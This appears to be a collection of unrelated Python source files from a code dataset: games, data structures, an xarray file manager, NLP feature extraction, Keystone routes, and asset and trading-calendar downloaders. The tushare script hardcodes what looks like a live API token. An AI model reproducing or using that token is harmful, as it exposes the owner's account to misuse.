c0=int(input())\n res=[[r0,c0]]\n\n while True:\n for i in itertools.count(1,2):\n steps=[(0,1)]*i+[(1,0)]*i+[(0,-1)]*(i+1)+[(-1,0)]*(i+1)\n for dis_r,dis_c in steps:\n r0+=dis_r\n c0+=dis_c\n if (0<=r0=(C*R):\n print(res)\n return\n\n\nsolve()","sub_path":"Code/CodeRecords/2276/60765/293249.py","file_name":"293249.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"482713149","text":"#init_board = ['#', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ', ' ']\n#curr_board = init_board\nhas_winner = False\ngame_on = True\n\n\ndef display_board(input_board):\n line_separator = '--------------------'\n horizontal_separator = ' | | '\n sign_positions = [1, 3, 5]\n vert_positions = [0, 2, 4, 6]\n for i in range(10):\n if i in vert_positions:\n print(line_separator)\n elif i in sign_positions:\n if i == 1:\n repl_string = horizontal_separator[0:2] + input_board[7] + horizontal_separator[3:]\n repl_string = repl_string[0:9] + input_board[8] + repl_string[10:]\n repl_string = repl_string[0:16] + input_board[9] + 
repl_string[17:]\n elif i == 3:\n repl_string = horizontal_separator[0:2] + input_board[4] + horizontal_separator[3:]\n repl_string = repl_string[0:9] + input_board[5] + repl_string[10:]\n repl_string = repl_string[0:16] + input_board[6] + repl_string[17:]\n elif i == 5:\n repl_string = horizontal_separator[0:2] + input_board[1] + horizontal_separator[3:]\n repl_string = repl_string[0:9] + input_board[2] + repl_string[10:]\n repl_string = repl_string[0:16] + input_board[3] + repl_string[17:]\n print(repl_string)\n\n\ndef clear_screen():\n print('\\n' * 100)\n\n\ndef show_board_info():\n position_board = ['#', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n print('Grid positions. Select a number to place your marker.')\n display_board(position_board)\n print('\\n####################################################\\n')\n\n\ndef player_input():\n valid_markers = ['X', 'O']\n input_string = ''\n while input_string not in valid_markers:\n input_string = input('What marker do you want? Enter X or O: ')\n return input_string\n\n\ndef choose_starter():\n import random\n if random.randint(0, 1) == 0:\n return 2\n return 1\n\n\ndef place_marker(board, marker, position):\n board[position] = marker\n return board\n\n\ndef position_check(board, position):\n if board[position] in ['X', 'O']:\n print('Hey, that spot is taken by {}. Pick another one!'.format(board[position]))\n return False\n return True\n\n\ndef calculate_win(input_board, marker):\n valid_combinations = [(1, 4, 7), (2, 5, 8), (3, 6, 9), (1, 2, 3), (4, 5, 6), (7, 8, 9), (1, 5, 9), (3, 5, 7)]\n for_the_win = False\n for valid in valid_combinations:\n if input_board[valid[0]] == marker and input_board[valid[1]] == marker and input_board[valid[2]] == marker:\n print('Looks like we have a winner. Congratulations player ' + str(input_board[valid[0]]) + '!')\n for_the_win = True\n display_board(input_board)\n break\n if ' ' not in set(input_board):\n display_board(input_board)\n print('Damn, it was a tie. No winner')\n return 'tie'\n return for_the_win\n\n\ndef replay():\n continue_play = ''\n while continue_play not in ['Y', 'N']:\n continue_play = input('Play again? Y/N')\n if continue_play == 'Y':\n return True\n elif continue_play == 'N':\n return False\n\n\nwhile game_on:\n curr_board = [' '] * 10\n p1_marker = player_input()\n p2_marker = 'O' if p1_marker == 'X' else 'X'\n starter = choose_starter()\n curr_marker = p1_marker if starter == 1 else p2_marker\n print('Player {} gets to start! 
Your marker is {}'.format(starter, curr_marker))\n\n while not has_winner:\n clear_screen()\n show_board_info()\n display_board(curr_board)\n next_marker = p2_marker if curr_marker == p1_marker else p1_marker\n desired_pos = input('Ok player {}, pick a free spot for your marker: '.format(curr_marker))\n valid_position = position_check(curr_board, int(desired_pos))\n if not valid_position:\n continue\n curr_board = place_marker(curr_board, curr_marker, int(desired_pos))\n game_over = calculate_win(curr_board, curr_marker)\n if game_over == 'tie':\n if not replay():\n game_on = False\n break\n else:\n has_winner = game_over\n curr_marker = next_marker\n\n if not replay():\n game_on = False\n else:\n has_winner = False\n\n","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"367822745","text":"# -*- coding: utf-8 -*-\r\n\r\nclass Node:\r\n def __init__(self, value):\r\n self.value = value\r\n self.next = None\r\n\r\n def __repr__(self):\r\n return str(self.value)\r\n\r\n\r\nclass LinkedList:\r\n def __init__(self):\r\n self.head = None\r\n\r\n def __str__(self):\r\n cur_head = self.head\r\n out_string = \"\"\r\n while cur_head:\r\n out_string += str(cur_head.value) + \" -> \"\r\n cur_head = cur_head.next\r\n return out_string\r\n\r\n\r\n def append(self, value):\r\n\r\n if self.head is None:\r\n self.head = Node(value)\r\n return\r\n\r\n node = self.head\r\n while node.next:\r\n node = node.next\r\n\r\n node.next = Node(value)\r\n\r\n def size(self):\r\n size = 0\r\n node = self.head\r\n while node:\r\n size += 1\r\n node = node.next\r\n return size\r\n \r\n def is_present(self,data):\r\n if self.head is None:\r\n return False\r\n current = self.head\r\n while current:\r\n if current.value==data:\r\n return True\r\n current=current.next\r\n return False\r\n \r\n\r\ndef union(list_1, list_2):\r\n union_list = LinkedList()\r\n \r\n node = list_1.head\r\n #traverse all nodes in list_1 and append values not already in union set.\r\n while node:\r\n union_list.append(node.value)\r\n node = node.next\r\n \r\n node = list_2.head\r\n #traverse all nodes in list_2 and append values not already in union set.\r\n while node:\r\n if union_list.is_present(node.value)==False: \r\n union_list.append(node.value)\r\n node = node.next\r\n \r\n return union_list\r\n pass\r\n\r\ndef intersection(list_1, list_2):\r\n # Your Solution Here\r\n intersection_list = LinkedList()\r\n node = list_1.head\r\n \r\n #traverse all nodes in list_1 and append values that are in list_2 set.\r\n while node:\r\n if list_2.is_present(node.value)==True:\r\n intersection_list.append(node)\r\n node = node.next\r\n \r\n return intersection_list\r\n pass\r\n\r\n\r\nprint(\"Test case 1\")\r\n\r\nlinked_list_1 = LinkedList()\r\nlinked_list_2 = LinkedList()\r\n\r\nelement_1 = [3,2,4,35,6,65,6,4,3,21]\r\nelement_2 = [6,32,4,9,6,1,11,21,1]\r\n\r\nfor i in element_1:\r\n if linked_list_1.is_present(i)==False: #as duplicates are not allowed in sets\r\n linked_list_1.append(i)\r\n\r\nfor i in element_2:\r\n if linked_list_2.is_present(i)==False: #as duplicates are not allowed in sets\r\n linked_list_2.append(i)\r\n\r\nprint (union(linked_list_1,linked_list_2)) #prints all the values in both the lists without duplicates\r\nprint (intersection(linked_list_1,linked_list_2)) #prints 4 , 6 , 21 as their intersection\r\n\r\nprint(\"Test case 2\")\r\n\r\nlinked_list_3 = LinkedList()\r\nlinked_list_4 = 
LinkedList()\r\n\r\nelement_1 = [3,2,4,35,6,65,6,4,3,23]\r\nelement_2 = [1,7,8,9,11,21,1]\r\n\r\nfor i in element_1:\r\n if linked_list_3.is_present(i)==False: #as duplicates are not allowed in sets\r\n linked_list_3.append(i)\r\n\r\nfor i in element_2:\r\n if linked_list_4.is_present(i)==False: #as duplicates are not allowed in sets\r\n linked_list_4.append(i)\r\n\r\n\r\nprint (union(linked_list_3,linked_list_4)) #prints all the values in both the lists without duplicates\r\n\r\nprint (intersection(linked_list_3,linked_list_4)) #prints nothing as there is no intersection in the values\r\n\r\nprint(\"Test case 3\")\r\n#this test case will have same union and intersection\r\n\r\nlinked_list_5 = LinkedList()\r\nlinked_list_6 = LinkedList()\r\n\r\nelement_1 = [1,7,8,9,11,21,1]\r\nelement_2 = [1,7,8,9,11,21,1]\r\n\r\nfor i in element_1:\r\n if linked_list_5.is_present(i)==False: #as duplicates are not allowed in sets\r\n linked_list_5.append(i)\r\n\r\nfor i in element_2:\r\n if linked_list_6.is_present(i)==False: #as duplicates are not allowed in sets\r\n linked_list_6.append(i)\r\n\r\n\r\nprint (union(linked_list_5,linked_list_6)) #prints all the values in a list as both the list are same\r\n\r\nprint (intersection(linked_list_5,linked_list_6)) #prints all the values in a list as both the list are same\r\n","sub_path":"P1/Problem_6.py","file_name":"Problem_6.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"645427894","text":"import threading\n\nfrom ..core import utils\nfrom ..core.options import OPTIONS\nfrom .lru_cache import LRUCache\n\n\n# Global cache for storing open files.\nFILE_CACHE = LRUCache(\n OPTIONS['file_cache_maxsize'], on_evict=lambda k, v: v.close())\nassert FILE_CACHE.maxsize, 'file cache must be at least size one'\n\n\n_DEFAULT_MODE = utils.ReprObject('')\n\n\nclass FileManager(object):\n \"\"\"Manager for acquiring and closing a file object.\n\n Use FileManager subclasses (CachingFileManager in particular) on backend\n storage classes to automatically handle issues related to keeping track of\n many open files and transferring them between multiple processes.\n \"\"\"\n\n def acquire(self):\n \"\"\"Acquire the file object from this manager.\"\"\"\n raise NotImplementedError\n\n def close(self, needs_lock=True):\n \"\"\"Close the file object associated with this manager, if needed.\"\"\"\n raise NotImplementedError\n\n\nclass CachingFileManager(FileManager):\n \"\"\"Wrapper for automatically opening and closing file objects.\n\n Unlike files, CachingFileManager objects can be safely pickled and passed\n between processes. They should be explicitly closed to release resources,\n but a per-process least-recently-used cache for open files ensures that you\n can safely create arbitrarily large numbers of FileManager objects.\n\n Don't directly close files acquired from a FileManager. 
Instead, call\n FileManager.close(), which ensures that closed files are removed from the\n cache as well.\n\n Example usage:\n\n manager = FileManager(open, 'example.txt', mode='w')\n f = manager.acquire()\n f.write(...)\n manager.close() # ensures file is closed\n\n Note that as long as previous files are still cached, acquiring a file\n multiple times from the same FileManager is essentially free:\n\n f1 = manager.acquire()\n f2 = manager.acquire()\n assert f1 is f2\n\n \"\"\"\n\n def __init__(self, opener, *args, **keywords):\n \"\"\"Initialize a FileManager.\n\n Parameters\n ----------\n opener : callable\n Function that when called like ``opener(*args, **kwargs)`` returns\n an open file object. The file object must implement a ``close()``\n method.\n *args\n Positional arguments for opener. A ``mode`` argument should be\n provided as a keyword argument (see below). All arguments must be\n hashable.\n mode : optional\n If provided, passed as a keyword argument to ``opener`` along with\n ``**kwargs``. ``mode='w' `` has special treatment: after the first\n call it is replaced by ``mode='a'`` in all subsequent function to\n avoid overriding the newly created file.\n kwargs : dict, optional\n Keyword arguments for opener, excluding ``mode``. All values must\n be hashable.\n lock : duck-compatible threading.Lock, optional\n Lock to use when modifying the cache inside acquire() and close().\n By default, uses a new threading.Lock() object. If set, this object\n should be pickleable.\n cache : MutableMapping, optional\n Mapping to use as a cache for open files. By default, uses xarray's\n global LRU file cache. Because ``cache`` typically points to a\n global variable and contains non-picklable file objects, an\n unpickled FileManager objects will be restored with the default\n cache.\n \"\"\"\n # TODO: replace with real keyword arguments when we drop Python 2\n # support\n mode = keywords.pop('mode', _DEFAULT_MODE)\n kwargs = keywords.pop('kwargs', None)\n lock = keywords.pop('lock', None)\n cache = keywords.pop('cache', FILE_CACHE)\n if keywords:\n raise TypeError('FileManager() got unexpected keyword arguments: '\n '%s' % list(keywords))\n\n self._opener = opener\n self._args = args\n self._mode = mode\n self._kwargs = {} if kwargs is None else dict(kwargs)\n self._default_lock = lock is None or lock is False\n self._lock = threading.Lock() if self._default_lock else lock\n self._cache = cache\n self._key = self._make_key()\n\n def _make_key(self):\n \"\"\"Make a key for caching files in the LRU cache.\"\"\"\n value = (self._opener,\n self._args,\n self._mode,\n tuple(sorted(self._kwargs.items())))\n return _HashedSequence(value)\n\n def acquire(self):\n \"\"\"Acquiring a file object from the manager.\n\n A new file is only opened if it has expired from the\n least-recently-used cache.\n\n This method uses a reentrant lock, which ensures that it is\n thread-safe. 
You can safely acquire a file in multiple threads at the\n same time, as long as the underlying file object is thread-safe.\n\n Returns\n -------\n An open file object, as returned by ``opener(*args, **kwargs)``.\n \"\"\"\n with self._lock:\n try:\n file = self._cache[self._key]\n except KeyError:\n kwargs = self._kwargs\n if self._mode is not _DEFAULT_MODE:\n kwargs = kwargs.copy()\n kwargs['mode'] = self._mode\n file = self._opener(*self._args, **kwargs)\n if self._mode == 'w':\n # ensure file doesn't get overriden when opened again\n self._mode = 'a'\n self._key = self._make_key()\n self._cache[self._key] = file\n return file\n\n def _close(self):\n default = None\n file = self._cache.pop(self._key, default)\n if file is not None:\n file.close()\n\n def close(self, needs_lock=True):\n \"\"\"Explicitly close any associated file object (if necessary).\"\"\"\n # TODO: remove needs_lock if/when we have a reentrant lock in\n # dask.distributed: https://github.com/dask/dask/issues/3832\n if needs_lock:\n with self._lock:\n self._close()\n else:\n self._close()\n\n def __getstate__(self):\n \"\"\"State for pickling.\"\"\"\n lock = None if self._default_lock else self._lock\n return (self._opener, self._args, self._mode, self._kwargs, lock)\n\n def __setstate__(self, state):\n \"\"\"Restore from a pickle.\"\"\"\n opener, args, mode, kwargs, lock = state\n self.__init__(opener, *args, mode=mode, kwargs=kwargs, lock=lock)\n\n\nclass _HashedSequence(list):\n \"\"\"Speedup repeated look-ups by caching hash values.\n\n Based on what Python uses internally in functools.lru_cache.\n\n Python doesn't perform this optimization automatically:\n https://bugs.python.org/issue1462796\n \"\"\"\n\n def __init__(self, tuple_value):\n self[:] = tuple_value\n self.hashvalue = hash(tuple_value)\n\n def __hash__(self):\n return self.hashvalue\n\n\nclass DummyFileManager(FileManager):\n \"\"\"FileManager that simply wraps an open file in the FileManager interface.\n \"\"\"\n def __init__(self, value):\n self._value = value\n\n def acquire(self):\n return self._value\n\n def close(self, needs_lock=True):\n del needs_lock # ignored\n self._value.close()\n","sub_path":"xarray/backends/file_manager.py","file_name":"file_manager.py","file_ext":"py","file_size_in_byte":7398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"424657573","text":"import numpy as np\r\nimport sys\r\nimport argparse\r\nimport os\r\nimport json\r\nimport string\r\nimport csv\r\n\r\n\r\ndef load_vars():\r\n first_p_prn = ['I', 'me', 'my', 'mine', 'we', 'us', 'our', 'ours']\r\n second_p_prn = ['you', 'your', 'yours', 'u', 'ur', 'urs']\r\n third_p_prn = ['he', 'him', 'his', 'she', 'her', 'hers', 'it', 'its', 'they', 'them', 'their', 'theirs']\r\n future_vb = [\"'ll\", \"will\", \"gonna\"]\r\n slang_ac = ['smh', 'fwb', 'lmfao', 'lmao', 'lms', 'tbh', 'rofl', 'wtf', 'bff', 'wyd', 'lylc', 'brb', 'atm', 'imao',\r\n 'sml', 'btw',\r\n 'bw', 'imho', 'fyi', 'ppl', 'sob', 'ttyl', 'imo', 'ltr', 'thx', 'kk', 'omg', 'omfg', 'ttys', 'afn',\r\n 'bbs', 'cya', 'ez', 'f2f',\r\n 'gtr', 'ic', 'jk', 'k', 'ly', 'ya', 'nm', 'np', 'plz', 'ru', 'so', 'tc', 'tmi', 'ym', 'ur', 'u', 'sol',\r\n 'fml']\r\n\r\n with open('Conjunct') as conjunct:\r\n ccs = conjunct.read()\r\n with open('femaleFirstNames.txt') as f_first_names:\r\n f_f_names = f_first_names.read()\r\n with open('lastNames.txt') as last_names:\r\n l_names = last_names.read()\r\n with open('maleFirstNames.txt') as m_first_names:\r\n m_f_names = 
m_first_names.read()\r\n\r\n bg_norms = {}\r\n fst_line = True\r\n with open('BristolNorms+GilhoolyLogie.csv') as bg_norms_file:\r\n bg_reader = csv.reader(bg_norms_file, delimiter=',')\r\n for row in bg_reader:\r\n if fst_line:\r\n fst_line = False\r\n continue\r\n bg_norms[row[1]] = row[3:6]\r\n\r\n w_norms = {}\r\n first_line = True\r\n with open('Ratings_Warriner_et_al.csv') as w_norms_file:\r\n w_reader = csv.reader(w_norms_file, delimiter=',')\r\n for row in w_reader:\r\n if first_line:\r\n first_line = False\r\n continue\r\n w_norms[row[1]] = [row[2]] + [row[5]] + [row[8]]\r\n\r\n return first_p_prn, second_p_prn, third_p_prn, future_vb, slang_ac, ccs, f_f_names, l_names, m_f_names, bg_norms, w_norms\r\n\r\n\r\ndef extract1( comment ):\r\n ''' This function extracts features from a single comment\r\n\r\n Parameters:\r\n comment : string, the body of a comment (after preprocessing)\r\n\r\n Returns:\r\n feats : numpy Array, a 173-length vector of floating point features (only the first 29 are expected to be filled, here)\r\n '''\r\n\r\n feats = np.zeros(30)\r\n\r\n # load lists and dicts used to check features\r\n first_p_prn, second_p_prn, third_p_prn, future_vb, slang_ac, ccs, f_f_names, l_names, m_f_names, bg_norms, w_norms = load_vars()\r\n\r\n first_pp = 0\r\n second_pp = 0\r\n third_pp = 0\r\n cc = 0\r\n past_vb = 0 #initialize features\r\n fut_vb = 0\r\n commas = 0\r\n c_nouns = 0\r\n p_nouns = 0\r\n adverbs = 0\r\n wh = 0\r\n slang = 0\r\n upper = 0\r\n total_token_length = 0\r\n punc = 0\r\n multipunc = 0\r\n nine11 = 0\r\n eos = comment.count(\"\\n\") # count sentences\r\n\r\n t_AoA = 0\r\n t_IMG = 0\r\n t_FAM = 0\r\n numb_bg = 0\r\n # initialize variables for norms\r\n AoA_list = []\r\n IMG_list = []\r\n FAM_list = []\r\n\r\n t_vms = 0\r\n t_ams = 0\r\n t_dms = 0\r\n num_w = 0\r\n\r\n vms_list = []\r\n ams_list = []\r\n dms_list = []\r\n\r\n\r\n\r\n\r\n for token in comment.split():\r\n if \"/\" in token and len(token.split(\"/\")) == 2: #split tokens into word and tag\r\n word, tag = token.split(\"/\")\r\n else:\r\n splitted = token.split(\"/\") #deal with words containing / like 9/11\r\n word = '/'.join(splitted[:-1])\r\n tag = splitted[-1]\r\n\r\n if word in first_p_prn:\r\n first_pp += 1\r\n if word in second_p_prn:\r\n second_pp += 1\r\n if word in third_p_prn:\r\n third_pp += 1\r\n if tag == 'cc' or word in ccs:\r\n cc += 1 #check each word for presence of features and increment\r\n if tag == 'vbd' or tag == 'vbn': #feature variables\r\n past_vb += 1\r\n if word in future_vb:\r\n fut_vb += 1\r\n if word == ',':\r\n commas += 1\r\n if word[0] in string.punctuation and word[-1] in string.punctuation and len(word) > 1:\r\n multipunc += 1\r\n if word == '9/11':\r\n nine11 += 1\r\n\r\n if tag == 'nn' or tag == 'nns':\r\n c_nouns += 1\r\n if tag == 'nnp' or tag == 'nnps' or word in f_f_names or word in l_names or word in m_f_names:\r\n p_nouns += 1\r\n if tag == 'rb' or tag == 'rbr' or tag == 'rbs':\r\n adverbs += 1\r\n if tag == 'wdt' or tag == 'wp' or tag == 'wp$' or tag == 'wrb':\r\n wh += 1\r\n if word in slang_ac:\r\n slang += 1\r\n if len(word) >= 3 and word.isupper():\r\n upper += 1\r\n # average length of sentences\r\n if word not in string.punctuation:\r\n total_token_length += len(word)\r\n if word in string.punctuation:\r\n punc += 1\r\n if word in bg_norms:\r\n t_AoA += int(bg_norms[word][0]) #accumulate total norm values to get avg and make list of values\r\n t_IMG += int(bg_norms[word][1]) # to get std dev\r\n t_FAM += int(bg_norms[word][2])\r\n numb_bg += 
1\r\n\r\n AoA_list.append(int(bg_norms[word][0]))\r\n IMG_list.append(int(bg_norms[word][1]))\r\n FAM_list.append(int(bg_norms[word][2]))\r\n if word in w_norms:\r\n t_vms += float(w_norms[word][0])\r\n t_ams += float(w_norms[word][1])\r\n t_dms += float(w_norms[word][2])\r\n num_w += 1\r\n\r\n vms_list.append(float(w_norms[word][0]))\r\n ams_list.append(float(w_norms[word][1]))\r\n dms_list.append(float(w_norms[word][2]))\r\n\r\n\r\n\r\n if len(comment.split()) != 0 and len(comment.split()) != punc:\r\n avg_token_len = (total_token_length) / (len(comment.split()) - punc)\r\n else:\r\n avg_token_len = 1\r\n if eos != 0:\r\n avg_sentence_len = len(comment.split()) / eos #make sure we dont get any divide by 0 errors\r\n else:\r\n eos = 1\r\n avg_sentence_len = len(comment.split())\r\n if numb_bg != 0:\r\n avg_AoA = t_AoA / numb_bg\r\n avg_IMG = t_IMG / numb_bg\r\n avg_FAM = t_FAM / numb_bg\r\n sd_AoA = np.std(AoA_list)\r\n sd_IMG = np.std(IMG_list)\r\n sd_FAM = np.std(FAM_list)\r\n else:\r\n avg_AoA = 0\r\n avg_IMG = 0\r\n avg_FAM = 0\r\n sd_AoA = 0\r\n sd_IMG = 0\r\n sd_FAM = 0\r\n if num_w != 0:\r\n avg_vms = t_vms / num_w\r\n avg_ams = t_ams / num_w\r\n avg_dms = t_dms / num_w\r\n sd_vms = np.std(vms_list)\r\n sd_ams = np.std(ams_list)\r\n sd_dms = np.std(dms_list)\r\n else:\r\n avg_vms = 0\r\n avg_ams = 0\r\n avg_dms = 0\r\n sd_vms = 0\r\n sd_ams = 0\r\n sd_dms = 0\r\n\r\n #create feature array\r\n feats[0], feats[1], feats[2], feats[3], feats[4], feats[5] = first_pp, second_pp, third_pp, cc, past_vb, fut_vb\r\n feats[6], feats[7], feats[8], feats[9], feats[10], feats[11] = commas, multipunc, c_nouns, p_nouns, adverbs, wh\r\n feats[12], feats[13], feats[14], feats[15], feats[16], feats[17] = slang, upper, avg_sentence_len, avg_token_len, eos, avg_AoA\r\n feats[18], feats[19], feats[20], feats[21], feats[22], feats[23] = avg_IMG, avg_FAM, sd_AoA, sd_IMG, sd_FAM, avg_vms\r\n feats[24], feats[25], feats[26], feats[27], feats[28], feats[29] = avg_ams, avg_dms, sd_vms, sd_ams, sd_dms, nine11\r\n return feats\r\n\r\n\r\n\r\n\r\ndef main( args ):\r\n\r\n data = json.load(open(args.input))\r\n feats = np.zeros( (len(data), 174+1))\r\n\r\n alt_features = np.load(\"Alt_feats.dat.npy\") #load features\r\n cen_features = np.load(\"Center_feats.dat.npy\")\r\n lef_features = np.load(\"Left_feats.dat.npy\")\r\n ri_features = np.load(\"Right_feats.dat.npy\")\r\n\r\n j = 0\r\n for field in data:\r\n feat = extract1(field[\"body\"].lower())\r\n id = field['id']\r\n cat = field['cat']\r\n i = 0\r\n with open(cat + \"_IDs.txt\") as ids: #find index of id\r\n line = ids.readlines()\r\n i = line.index(id + '\\r\\n')\r\n\r\n\r\n if cat == \"Left\": #append relevant features and then category to feature array\r\n feat = np.append(feat, lef_features[i], axis=None)\r\n feat = np.append(feat, [0])\r\n elif cat == \"Center\":\r\n feat = np.append(feat, cen_features[i], axis=None)\r\n feat = np.append(feat, [1])\r\n elif cat == \"Right\":\r\n feat = np.append(feat, ri_features[i], axis=None)\r\n feat = np.append(feat, [2])\r\n elif cat == \"Alt\":\r\n feat = np.append(feat, alt_features[i], axis=None)\r\n feat = np.append(feat, [3])\r\n feats[j] = feat\r\n j += 1\r\n\r\n\r\n\r\n\r\n np.savez_compressed( args.output, feats)\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n\r\n\r\n parser = argparse.ArgumentParser(description='Process each .')\r\n parser.add_argument(\"-o\", \"--output\", help=\"Directs the output to a filename of your choice\", required=True)\r\n parser.add_argument(\"-i\", \"--input\", 
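The word/tag splitting above guards against words that themselves contain slashes (such as 9/11) by rejoining all but the last segment; str.rpartition expresses the same idea in one call by splitting only at the rightmost slash. A standalone sketch, separate from the feature-extraction code:

def split_token(token):
    # Split a 'word/TAG' token at the last slash only, so internal
    # slashes (e.g. '9/11/nn') stay inside the word.
    word, _, tag = token.rpartition('/')
    return word, tag

assert split_token('dog/nn') == ('dog', 'nn')
assert split_token('9/11/nn') == ('9/11', 'nn')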
help=\"The input JSON file, preprocessed as in Task 1\", required=True)\r\n args = parser.parse_args()\r\n\r\n\r\n main(args)\r\n\r\n","sub_path":"Text classifier/a1_extractFeaturesBonus.py","file_name":"a1_extractFeaturesBonus.py","file_ext":"py","file_size_in_byte":9343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"442164369","text":"#!/usr/bin/ python3\n# -*- coding:utf-8 -*-\n'''\n Author:zyf\n 功能:利用tushare库下载可交易日,并保存为csv文件。\n'''\nimport tushare as ts\nstart = '20190101'\nend = '20191231'\n\nts.set_token('89b4c72135b4dd4deb39b689a2c640aacf09fe44be16e51f341693ce')\npro = ts.pro_api()\n\ndf = pro.trade_cal(exchange='',start_date=start,end_date=end)\n#print(df)\ndf.to_csv('./trade_cal.csv')\n\n#print(df.cal_date[0])\n\n","sub_path":"trade_cal.py","file_name":"trade_cal.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"22085284","text":"# Copyright 2018 SUSE Linux GmbH\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\"\"\"WSGI Routers for the Application Credential service.\"\"\"\n\nfrom keystone.application_credential import controllers\nfrom keystone.common import json_home\nfrom keystone.common import wsgi\n\nAPP_CRED_RESOURCE_RELATION = json_home.build_v3_resource_relation(\n 'application_credential')\nAPP_CRED_PARAMETER_RELATION = json_home.build_v3_parameter_relation(\n 'application_credential_id')\nAPP_CRED_COLLECTION_PATH = '/users/{user_id}/application_credentials'\nAPP_CRED_RESOURCE_PATH = (\n '/users/{user_id}/application_credentials/{application_credential_id}'\n)\n\n\nclass Routers(wsgi.RoutersBase):\n _path_prefixes = (APP_CRED_COLLECTION_PATH, 'users',)\n\n def append_v3_routers(self, mapper, routers):\n app_cred_controller = controllers.ApplicationCredentialV3()\n\n self._add_resource(\n mapper, app_cred_controller,\n path=APP_CRED_COLLECTION_PATH,\n get_head_action='list_application_credentials',\n post_action='create_application_credential',\n rel=APP_CRED_RESOURCE_RELATION,\n path_vars={\n 'user_id': json_home.Parameters.USER_ID,\n })\n\n self._add_resource(\n mapper, app_cred_controller,\n path=APP_CRED_RESOURCE_PATH,\n get_head_action='get_application_credential',\n delete_action='delete_application_credential',\n rel=APP_CRED_RESOURCE_RELATION,\n path_vars={\n 'user_id': json_home.Parameters.USER_ID,\n 'application_credential_id': APP_CRED_PARAMETER_RELATION,\n })\n","sub_path":"keystone/application_credential/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"508019879","text":"# FCA 프로그램 제작 프로젝트 \r\n# InputContext_without_Pandas : Formal Context를 입력처리하는 함수(또는 모듈)\r\n# 2018210032 김태영\r\n# 2021.05.08.\r\nimport csv\r\n\r\ndef InputContext(fileName):\r\n \"\"\"\r\n Input : MS Excel파일(csv형식. 
K := (G,M,I)내용)\r\n Output : N/A\r\n \"\"\"\r\n f = open(fileName,'r', encoding='utf-8')\r\n data = list(csv.reader(f))\r\n \r\n G = [i[0] for i in data[1:]]\r\n M = data[0]\r\n GXM = [i[1:] for i in data[1:]]\r\n I = []\r\n \r\n # Process : Formal Context를 읽어들여서 \"적절한 Data구조 K\"에 저장\"\r\n # G : 객체들의 집합, M : 속성들의 집합, I : 객체와 속성 사이의 관계 집합 (I ⊆ G × M), formal context K:=(G, M, I)\r\n for g in range(len(GXM)):\r\n for m in range(len(GXM[g])):\r\n if GXM[g][m] in ['x', 'X']:\r\n I.append((G[g], M[m]))\r\n \r\n K = [set(G),set(M),set(I)]\r\n return(K)\r\n f.close()\r\n \r\n\r\n# example\r\ncsv_FileName = \"./TestData.csv\"\r\nresult = InputContext(csv_FileName)\r\nprint(result) ","sub_path":"InputContext_without_Pandas_kty.py","file_name":"InputContext_without_Pandas_kty.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"290546250","text":"# 简单输出斐波那契數列前 N 个数\n# 但有经验的开发者会指出,直接在 fab 函数中用 print 打印数字会导致该函数可复用性较差,因为 fab 函数返回 None,其他函数无法获得该函数生成的数列。\ndef fab(max):\n n, a, b = 0, 0, 1\n while n < max:\n print(b)\n a, b = b, a + b\n n = n + 1\n\n\nfab(5)\n\n\n# 改写后的 fab 函数通过返回 List 能满足复用性的要求,但是更有经验的开发者会指出,该函数在运行中占用的内存会随着参数 max 的增大而增大,如果要��制内存占用,最好不要用 List\n# 来保存中间结果,而是通过 iterable 对象来迭代\ndef fab2(max):\n n, a, b = 0, 0, 1\n L = []\n while n < max:\n L.append(b)\n a, b = b, a + b\n n = n + 1\n return L\n\n\nfor n in fab2(5):\n print(n)\n\n# 清单 3. 通过 iterable 对象来迭代\nfor i in range(1000): pass\n\n\n# 不会生成一个 1000 个元素的 List,而是在每次迭代中返回下一个数值,内存空间占用很小。因为 xrange 不返回 List,而是返回一个 iterable 对象\n# for i in xrange(1000): pass\n\n# Fab 类通过 next() 不断返回数列的下一个数,内存占用始终为常数:\nclass Fab(object):\n def __init__(self, max):\n self.max = max\n self.n, self.a, self.b = 0, 0, 1\n\n def __iter__(self):\n return self\n\n def next(self):\n if self.n < self.max:\n r = self.b\n self.a, self.b = self.b, self.a + self.b\n self.n = self.n + 1\n return r\n raise StopIteration()\nfor n in Fab(5):\n print (n)","sub_path":"base/yieldDemo2.py","file_name":"yieldDemo2.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"336438449","text":"#!/usr/bin/env python3\n\n# This script is modified from https://github.com/SaschaWillems/Vulkan/blob/master/download_assets.py\n\nimport sys\nimport os\nfrom urllib.request import urlretrieve\nfrom zipfile import ZipFile\n\nASSET_GENERAL_TEXTURE_URL = \"https://vulkan-tutorial.com/images/texture.jpg\"\nASSET_CHALET_TEXTURE_URL = \"https://vulkan-tutorial.com/resources/chalet.jpg\"\nASSET_CHALET_OBJ_URL = 